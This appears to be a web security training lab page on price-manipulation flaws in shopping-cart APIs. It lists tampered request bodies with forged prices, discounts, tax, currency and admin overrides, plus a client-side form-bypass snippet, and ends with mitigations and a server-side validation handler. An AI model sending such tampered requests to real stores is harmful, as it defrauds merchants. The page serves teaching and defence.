Lab 1: Price Manipulation

Price manipulation vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates price manipulation vulnerabilities where attackers can modify prices, discounts, and payment amounts to gain financial benefits or bypass pricing controls.

Objective: Understand how price manipulation attacks work and how to exploit them.

⚠️ Price Manipulation Warning

This lab demonstrates price manipulation vulnerabilities:

  • Client-Side Validation - No server-side price validation
  • Parameter Tampering - Price can be modified in requests
  • Negative Prices - Negative values allowed
  • No Authorization - No price verification
Manipulation Techniques

These techniques can be used for price manipulation:

  • Parameter Tampering - Modify price parameters
  • Negative Prices - Use negative values
  • Decimal Manipulation - Use very small decimals
  • Client-Side Bypass - Disable client validation
Price Manipulation Techniques
Parameter Tampering

// Modify price in POST request
{
  "item_id": "ITEM001",
  "item_name": "Expensive Product",
  "quantity": 1,
  "price": 0.01             // Original price was $99.99
}

Negative Prices

// Use negative prices
{
  "item_id": "ITEM001",
  "item_name": "Product",
  "quantity": 1,
  "price": -50.00           // Negative price
}

Decimal Manipulation

// Use very small decimals
{
  "item_id": "ITEM001",
  "item_name": "Product",
  "quantity": 1000,
  "price": 0.0001           // Very small price
}

Client-Side Bypass

// Disable client validation
document.getElementById('price').disabled = false;
document.getElementById('price').value = '0.01';
// Or modify the form action (assumed: the cart form is the first form on the page)
const form = document.querySelector('form');
form.action = '/bypass_price_validation';

Discount Manipulation

// Manipulate discount codes
{
  "item_id": "ITEM001",
  "discount_code": "ADMIN100",
  "price": 99.99,
  "discount_percent": 100   // 100% discount
}

Currency Manipulation

// Change currency to get better rates
{
  "item_id": "ITEM001",
  "price": 99.99,
  "currency": "VND",        // Vietnamese Dong
  "exchange_rate": 0.000043 // Very low rate
}
Vulnerability Details
  • Type: Price Manipulation
  • Severity: High
  • Method: Parameter tampering
  • Issue: No server-side validation
Attack Vectors
  • Parameter Tampering: Modify price parameters
  • Negative Prices: Use negative values
  • Decimal Manipulation: Use very small decimals
  • Client-Side Bypass: Disable client validation
Price Manipulation Examples

Use these techniques to exploit price manipulation vulnerabilities:

1. Basic Price Manipulation:

// Original request
POST /add_to_cart
{
  "item_id": "ITEM001",
  "item_name": "Expensive Product",
  "quantity": 1,
  "price": 99.99
}

// Manipulated request
POST /add_to_cart
{
  "item_id": "ITEM001",
  "item_name": "Expensive Product",
  "quantity": 1,
  "price": 0.01
}

2. Negative Price Attack:

// Use negative prices to get refunds
{
  "item_id": "ITEM001",
  "item_name": "Product",
  "quantity": 1,
  "price": -50.00
}
// This could result in a refund of $50

3. Decimal Manipulation:

// Use very small decimals
{
  "item_id": "ITEM001",
  "item_name": "Product",
  "quantity": 1000,
  "price": 0.0001
}
// Total: $0.10 instead of $99,990

4. Discount Code Manipulation:

// Manipulate discount codes
{
  "item_id": "ITEM001",
  "discount_code": "ADMIN100",
  "price": 99.99,
  "discount_percent": 100,
  "discount_amount": 99.99
}
// Result: Free product

5. Currency Exchange Manipulation:

// Change currency to get better rates
{
  "item_id": "ITEM001",
  "price": 99.99,
  "currency": "VND",
  "exchange_rate": 0.000043,
  "original_currency": "USD"
}
// Convert $99.99 to VND at a very low rate

6. Quantity and Price Manipulation:

// Combine quantity and price manipulation
{
  "item_id": "ITEM001",
  "item_name": "Product",
  "quantity": 1000,
  "price": 0.01,
  "bulk_discount": 90
}
// Get 1000 items for $10 instead of $99,990

7. Tax Manipulation:

// Manipulate tax calculations
{
  "item_id": "ITEM001",
  "price": 99.99,
  "tax_rate": -10,          // Negative tax
  "tax_amount": -9.99
}
// Get a tax refund instead of paying tax

8. Shipping Cost Manipulation:

// Manipulate shipping costs
{
  "item_id": "ITEM001",
  "price": 99.99,
  "shipping_cost": -50.00,  // Negative shipping
  "free_shipping_threshold": 50
}
// Get free shipping and a refund

9. Coupon Code Manipulation:

// Manipulate coupon codes
{
  "item_id": "ITEM001",
  "price": 99.99,
  "coupon_code": "ADMIN100",
  "coupon_discount": 99.99,
  "coupon_type": "percentage",
  "coupon_value": 100
}
// 100% discount coupon

10. Membership Discount Manipulation:

// Manipulate membership discounts
{
  "item_id": "ITEM001",
  "price": 99.99,
  "membership_level": "premium",
  "membership_discount": 50,
  "membership_override": true
}
// 50% discount for premium membership

11. Bulk Purchase Manipulation:

// Manipulate bulk purchase discounts
{
  "item_id": "ITEM001",
  "price": 99.99,
  "quantity": 1000,
  "bulk_discount_percent": 90,
  "bulk_discount_amount": 899.91,
  "bulk_threshold": 100
}
// 90% bulk discount

12. Time-Based Price Manipulation:

// Manipulate time-based pricing
{
  "item_id": "ITEM001",
  "price": 99.99,
  "sale_start": "2024-01-01",
  "sale_end": "2024-12-31",
  "sale_price": 0.01,
  "sale_active": true
}
// Always on sale for $0.01

13. Geographic Price Manipulation:

// Manipulate geographic pricing
{
  "item_id": "ITEM001",
  "price": 99.99,
  "country": "US",
  "region": "CA",
  "local_price": 0.01,
  "currency": "USD",
  "exchange_rate": 1
}
// Use local pricing at a very low rate

14. User Role Price Manipulation:

// Manipulate user role pricing
{
  "item_id": "ITEM001",
  "price": 99.99,
  "user_role": "admin",
  "role_discount": 100,
  "role_override": true
}
// 100% discount for admin role

15. API Endpoint Manipulation:

// Use different API endpoints
// Instead of /add_to_cart, use /admin/add_to_cart
POST /admin/add_to_cart
{
  "item_id": "ITEM001",
  "price": 0.01,
  "admin_override": true,
  "skip_validation": true
}
Real-World Attack Scenarios
Mitigation Strategies
  • Implement server-side price validation
  • Use secure price storage and retrieval
  • Implement proper authorization checks
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual pricing patterns
  • Implement proper input validation
  • Use secure session management
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use price verification systems
  • Implement proper audit trails
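As an added example (not the lab's own code), here is a server-side cart handler that applies the first three mitigations above: it prices the line from a server-held catalog, rejects invalid quantities and unknown coupon codes, and reports every client-supplied pricing field so that payloads like those in the Examples section are ignored and logged rather than honoured. The catalog, the coupon table and the quantity cap are constructed assumptions.

```python
# Constructed sample data; the lab's real catalog and coupon table are not on the page.
CATALOG = {"ITEM001": {"name": "Expensive Product", "price_cents": 9999}}  # $99.99
COUPONS = {"SAVE10": 10}  # server-side table: code -> percent off
MAX_QTY = 1000            # assumed per-line quantity cap
# Fields the page's payloads tamper with; the server never reads them for pricing.
CLIENT_ONLY_FIELDS = ("discount_percent", "discount_amount", "tax_rate", "tax_amount",
                      "shipping_cost", "exchange_rate", "currency", "sale_price",
                      "local_price", "role_discount", "role_override", "admin_override",
                      "skip_validation", "membership_override", "bulk_discount_percent")


class PriceError(ValueError):
    """Raised when a cart request fails server-side validation."""


def price_cart_line(request, catalog=CATALOG, coupons=COUPONS):
    """Price one cart line from server-side data only.

    The client may choose an item, an integer quantity and a coupon code; every
    monetary value comes from the catalog. Returns (total_cents, warnings), where
    warnings lists tampering attempts that should be logged and monitored.
    """
    item = catalog.get(request.get("item_id"))
    if item is None:
        raise PriceError("unknown item_id")
    qty = request.get("quantity")
    if isinstance(qty, bool) or not isinstance(qty, int) or not 1 <= qty <= MAX_QTY:
        raise PriceError(f"quantity must be an integer in 1..{MAX_QTY}")
    # The discount percentage is looked up, never read from the body
    # (defeats "discount_code": "ADMIN100" paired with "discount_percent": 100).
    percent_off = 0
    code = request.get("coupon_code") or request.get("discount_code")
    if code is not None:
        if code not in coupons:
            raise PriceError("unknown coupon code")
        percent_off = coupons[code]
    # Integer cents: no floating-point rounding for 0.0001-style prices to exploit.
    total = item["price_cents"] * qty * (100 - percent_off) // 100
    warnings = [f"ignored client field {f}={request[f]!r}"
                for f in CLIENT_ONLY_FIELDS if f in request]
    if "price" in request:  # a client-sent price is only ever evidence, never input
        try:
            claimed = round(float(request["price"]) * 100)
        except (TypeError, ValueError):
            claimed = None
        if claimed != item["price_cents"]:
            warnings.append(f"price mismatch: client sent {request['price']!r}, "
                            f"catalog has {item['price_cents']} cents")
    return total, warnings
```

Feeding the page's "Decimal Manipulation" payload (quantity 1000, price 0.0001) through this handler yields 9,999,000 cents, the $99,990 the page says the attacker was trying to avoid, plus a logged price mismatch.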